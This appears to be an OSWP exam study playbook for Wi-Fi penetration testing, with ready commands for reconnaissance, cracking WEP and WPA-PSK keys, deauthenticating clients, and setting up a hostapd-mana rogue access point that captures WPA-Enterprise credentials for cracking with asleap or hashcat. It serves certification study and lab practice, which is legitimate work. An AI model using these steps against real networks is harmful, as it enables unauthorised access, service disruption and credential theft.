1. Summary
2. Contact & Follow Us
   1. Follow The PlayBook Updates
3. Reconnaissance
   1. Setup Interfaces
   2. Monitor Networks
   3. Discover Hidden Networks
   4. Change Channel
   5. Change MAC Address
      1. Tips
4. Connecting to Networks
   1. Connect to Open Network
   2. Connect to WPA(1/2/3) Networks
   3. Connect to WPA Enterprise
   4. Connect to WEP Network
5. Attacking Networks
   1. Attacking WEP Networks
   2. Attacking WPA-PSK Networks
   3. Attacking WPA-Enterprise
6. Install Required Tools & Packages:
   1. FreeRADIUS
   2. Hostapd-Mana
   3. Aircrack-ng
   4. Asleap
   5. Hashcat
   6. John the Ripper
7. Resources & Labs
   1. Resources
   2. Labs and Linux Dist
      1. Labs 5.2.1
      2. Linux Dist
   3. Comments and More

By Zeyad Azima

Summary

Kudos to my friend @Abdulrahman for starting the first version of the playbook and after contributing together we update it with organized structure, More steps and practicality. You can download the PDF version of the book fro here.

Contact & Follow Us

Github	Abdulrahman	Zeyad
Linkedin	Abdulrahman	Zeyad
Twitter/X	Abdulrahman	Zeyad
Website		Zeyad
Email	0xexploiteagle@gmail.com	contact@zeyadazima.com

Follow The PlayBook Updates

• https://github.com/abdoibrahim1337/OSWP-PlayBook
• https://zeyadazima.com/notes/oswplaybook/

Reconnaissance

Setup Interfaces

• Set Interface to monitor mode

sudo airmon-ng check kill && sudo airmon-ng start <interface>

• Set Interface to managed mode

sudo airmon-ng stop <interface>

Monitor Networks

• Monitor Networks

sudo airodump-ng --band abg --manufacturer <interface_in_mointor_mode>

• Monitor Networks including WPS

sudo airodump-ng --band abg --manufacturer --wps <interface_in_mointor_mode>

• Monitor Specific Network/BSSID

sudo airodump-ng --band abg --manufacturer --bssid <BSSID> -c <channel> <interface_in_mointor_mode>

Discover Hidden Networks

• Get hidden Network ESSID using BSSID

sudo airodump-ng --band abg --bssid <mac> wlan0mon

• Get hidden Network w/ Bruteforcing

mdk4 wlan0mon p -t <BSSID> -f <wordlist>

Change Channel

• The interface has to be in monitor mode:

sudo iwconfig <interface_in_mointor_mode> channel <number>

Change MAC Address

1. Stop network manager
   systemctl stop network-manager
2. Stop Interface
   ip link set wlan0 down
3. Change the MAC address
   macchanger -m <new_mac_address> <interface>
4. Start Interface
   ip link set wlan0 up

Tips

If not succeed in this case may

1. interface name is wrong
2. your interface in monitor mode
   In second case to fix it set it to managed mode:
   sudo airmon-ng stop <int>

Connecting to Networks

Connect to Open Network

open.conf

network={ ssid="Open_Network_Name" key_mgmt=NONE }

Set ssid to the network name you want to connect to. Then, Save it to open.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

Connect to WPA(1/2/3) Networks

WPA

network={ ssid="SSID" psk="password" scan_ssid=1 key_mgmt=WPA-PSK proto=WPA2 }

for the proto set it to the WPA(version):

• WPA
• WPA2
• WPA3

Set ssid to the network name you want to connect to. Then, Save it to wpa.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

Connect to WPA Enterprise

network={ ssid="SSID" scan_ssid=1 key_mgmt=WPA-EAP eap=PEAP identity="identity\user" password="password" phase1="peaplabel=0" phase2="auth=MSCHAPV2" }

set identity to the username, and password to the password.
Set ssid to the network name you want to connect to. Then, Save it to wpa_entp.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

Connect to WEP Network

network={ ssid="SSID" key_mgmt=NONE wep_key0="" wep_tx_keyidx=0 }

Note : Password(wep_key0) in WEP should be lowercase if hex and without ""
Capital also works in hex password

Set ssid to the network name you want to connect to. Then, Save it to wep.conf and connect using the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

Attacking Networks

Attacking WEP Networks

image

1. Capture packets with the WEP network info

sudo airodump-ng -w <pcap_file_name> --band abg --bssid <mac> -c <channel> wlan0mon

image

2. Send fake authentication

sudo aireplay-ng -1 0 -a <BSSID> -h <Interface_Mac> -e "ESSID" <Interface>

Note: The interface mac address you can use anything also you if you would like to spoof one

image

3. ARPreplay Attack

sudo aireplay-ng --arpreplay -b <BSSID> -h <Interface_mac_address> <interface_in_mointor_mode>

image

4. Crack password

sudo aircrack-ng wep-01.cap

image

Attacking WPA-PSK Networks

1. Gathering information of the target network like the Channel , BSSID

sudo airodump-ng --band abg <interface_in_mointor_mode>

image

The above network type is WPA1 as there is no version appered

2. Capture Handshake

sudo airodump-ng <interface_in_monitor_mode> --bssid <BSSID> -c <channel> -w <pcap_file_name>

image

3. Perform De-authentication attack (kick a spasific client from the network to get the handshake)

sudo aireplay-ng -0 5 -c <client-mac> -a <BSSID> <interface_in_mointor_mode>

Note: Delete -c option if you want to do it in broadcast (Kick all clients)

image

4. Wait till get the handshake

image

5. After getting EAPOL ( Handshake), We will crack the password using aircrack-ng

sudo aircrack-ng -w <wordlist> capfile.cap

Connect to the network using connecting to networks section

image

Attacking WPA-Enterprise

1. First, We gather information about the network like BSSID , channel to filter the networks using:

sudo airodump-ng --band abg <interface_in_mointor_mode>

image

2. Then we gather handshake for the enterprise network

sudo airodump-ng --band abg -c x --bssid <BSSID> -w <pcap_file_name> <interface_in_mointor_mode>

image

3. After that we look at clients of the network and try to De-authenticate a client to get PMKID for the network:

sudo aireplay-ng -0 4 -a <BSSID> -c <client_mac> <interface_in_mointor_mode>

Then we wait till we get handshake, In some cases we can wait client to connect.

image

4. After we get it we go through cap file and extract the IDENTITY USER

image

5. Extract the Certificate

image

Note: Save the cert in der as the following

image

6. We also display information of certificate using this command

openssl x509 -inform der -in CERTIFICATE_FILENAME -text

image

7. Fake the network using freeradius
   We go to /etc/freeradius/3.0/certs path, Then we change the following 2 files with information we obtained from the certificate:

nano ca.cnf

image

nano server.cnf

image

9. After that we do the following commands under /etc/freeradius/3.0/certs to generate Diffie Hellman key for hostapd-mana

rm dh make

image

You may encounter error as the following, You can ignore it

image

10 . We create EAP user filename mana.eap_user

* PEAP,TTLS,TLS,FAST "t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]

image

11. After that we create a fake access point by creating a file called network.conf under any other directory
12. We paste the following configurations in the file and modify it to our needs:

ssid=<ESSID> interface=<managed_mode_interface> driver=nl80211 channel=<channel> hw_mode=a ieee8021x=1 eap_server=1 eapol_key_index_workaround=0 eap_user_file=/etc/hostapd-mana/mana.eap_user ca_cert=/etc/freeradius/3.0/certs/ca.pem server_cert=/etc/freeradius/3.0/certs/server.pem private_key=/etc/freeradius/3.0/certs/server.key private_key_passwd=whatever dh_file=/etc/freeradius/3.0/certs/dh auth_algs=1 wpa=3 wpa_key_mgmt=WPA-EAP wpa_pairwise=CCMP TKIP mana_wpe=1 mana_credout=/tmp/hostapd.credoutfile mana_eapsuccess=1 mana_eaptls=1

image

13. Turn the interface to managed mode again

14. Then use the following command to create fake AP

sudo hostapd-mana <file.conf>

image

15. Perform De-authentication attack (kick a spasific client from the network to get the handshake), Using another interface:

sudo aireplay-ng -0 0 -c <client-mac> -a <BSSID> <interface_in_mointor_mode>

Note: Delete -c option if you want to do it in broadcast (Kick all clients)
You need to use another interface in monitor mode, Also you need to set the interface to the same channel as the target network before performing the De-authenticate attack, As the following:

image

Tip: If there are 2 Enterprise network with the same name, You need to perform the De-authenticate attack on both of the networks.

16. then once you get handshake you will copy and paste command of asleep and adding -W /path/to/wordlist

asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst

image

Note: if it doesn’t work with you can get the hash of the Hashcat tool and put it in file called hashfile and use this command to crack it
hashcat -a 0 -m 5500 hashfile rockyou.txt --force

image

17. After getting username and password here you go for connecting to the network section.

Install Required Tools & Packages:

FreeRADIUS

sudo apt update sudo apt install freeradius freeradius-utils

Hostapd-Mana

sudo apt update sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev git clone https://github.com/sensepost/hostapd-mana.git cd hostapd-mana/hostapd make sudo make install

Aircrack-ng

sudo apt update sudo apt install aircrack-ng

Asleap

sudo apt update sudo apt install asleap

Hashcat

sudo apt update sudo apt install hashcat

John the Ripper

sudo apt update sudo apt install john

Resources & Labs

Resources

• https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet
• https://github.com/drewlong/oswp_notes
• https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/

Labs and Linux Dist

Labs 5.2.1

• https://wifichallengelab.com
• https://github.com/r4ulcl/WiFiChallengeLab-docker

Note: For this lab you won’t need any physical cards or anything all performed through, The labs virtual machine include everything, shoutout for r4ulcl for this amazing lab.

Linux Dist

• https://www.wifislax.com: Wireless Pentest OS